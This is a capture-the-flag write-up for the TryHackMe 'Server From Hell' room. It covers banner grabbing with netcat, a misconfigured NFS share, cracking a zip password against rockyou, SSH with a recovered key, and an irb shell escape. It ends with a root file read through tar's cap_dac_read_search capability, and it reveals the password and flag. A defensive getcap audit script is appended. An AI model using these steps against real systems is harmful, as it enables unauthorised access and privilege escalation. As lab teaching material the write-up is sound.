2020-11-03 23:43:42 +05:00


TryHackMe-Server From Hell

Abdullah Rizwan | 05:54 PM | 3rd November ,2020

NMAP

Not shown: 94 closed ports
PORT      STATE SERVICE               VERSION
1/tcp     open  tcpmux?
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
3/tcp     open  compressnet?
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
4/tcp     open  unknown
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
6/tcp     open  unknown
........

This box has a very large number of open ports, so the full scan output is not reproduced here.

The room description says to start from port 1337, so:

PORT 1337

nc 10.10.173.96 1337

Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the ports

This is the message we get when we connect to port 1337

I made a simple script that connects to each of the first 100 ports and grabs its banner:

#!/bin/sh
# Connect to ports 1 through 100 in turn and print whatever banner each service sends.
i=1
while [ $i -le 100 ]
do
	echo "== port $i =="
	# -w 2: give up after 2 seconds so a port that never answers does not hang the loop
	nc -w 2 10.10.173.96 $i
	i=$(( i + 1 ))
done

PORT 12345

nc 10.10.173.96 12345
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scan

PORT 2049

The default port for NFS is 2049, so let's check whether there are any shares we can mount on our local machine.

Now let's mount that share

We only find a backup.zip

But it asks for a password

Fcrackzip

Now let's use it to brute-force the archive's password:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip 


PASSWORD FOUND!!!!: pw == zxcvbnm

But I couldn't extract the files because of a read-only file system, so I used the GUI archive viewer to look at their contents.

From there I was able to grab the flag, the hint and the SSH private key.

hint.txt says:

2500-4500

I tried to SSH into the box using the hades private key, but SSH was not on port 22.

In the scan results I searched for the port identified as an OpenSSH service.

And I was logged in :D

 Welcome to hell. We hope you enjoy your stay!
 irb(main):001:0> puts 'hello'
hello
=> nil
irb(main):002:0> 

This irb is the interactive Ruby shell (the Ruby equivalent of the Python REPL), so to get a /bin/bash shell run:

exec '/bin/bash'

Privilege Escalation

The room gives us a hint about getcap. This command lists which files or binaries have Linux capabilities set; some capabilities let a binary access almost anything on the system. So run:

getcap -r / 2>/dev/null   (2>/dev/null redirects standard error, file descriptor 2, to /dev/null so permission-denied noise is hidden)

hades@hell:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep

Visiting GTFOBins:

https://gtfobins.github.io/gtfobins/tar/

hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
thm{w0w_n1c3_3sc4l4t10n}
hades@hell:~$
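The getcap finding above is the whole privilege-escalation path: cap_dac_read_search on /bin/tar lets it read any file. As an added example (not part of the original writeup), here is a small defender-side audit script that parses getcap output and flags capabilities that bypass file permissions or grant root-equivalent power; the sample lines and the DANGEROUS list are assumptions constructed for the demo, mirroring the writeup's findings.

```shell
#!/bin/sh
# Audit `getcap -r / 2>/dev/null` output for capabilities that let a binary
# bypass DAC (read/write any file) or escalate directly. List is an assumption.
DANGEROUS='cap_dac_read_search cap_dac_override cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_chown cap_fowner'

# Constructed sample getcap output. Older libcap prints "<path> = <caps>+<flags>",
# libcap 2.41+ prints "<path> <caps>=<flags>"; both forms are handled.
SAMPLE='/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 cap_setuid=ep'

# flag_dangerous_caps: read getcap lines on stdin, print "<path> <capability>"
# for every dangerous capability found. Prints nothing when the host is clean.
flag_dangerous_caps() {
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        path=${line%% *}                                   # first field is the path
        norm=" $(printf '%s' "$line" | tr '=,+' '   ') "  # turn "=", "," and "+" into separators
        for cap in $DANGEROUS; do
            case "$norm" in
                *" $cap "*) printf '%s %s\n' "$path" "$cap" ;;
            esac
        done
    done
}

# Stand-alone run over the constructed sample. On a real host replace the
# sample with: getcap -r / 2>/dev/null | flag_dangerous_caps
# Remediation for a flagged binary is `setcap -r <path>` (drop all its caps).
printf '%s\n' "$SAMPLE" | flag_dangerous_caps
```

On the writeup's box this would report /bin/tar with cap_dac_read_search, which is exactly the capability the GTFOBins tar trick relies on.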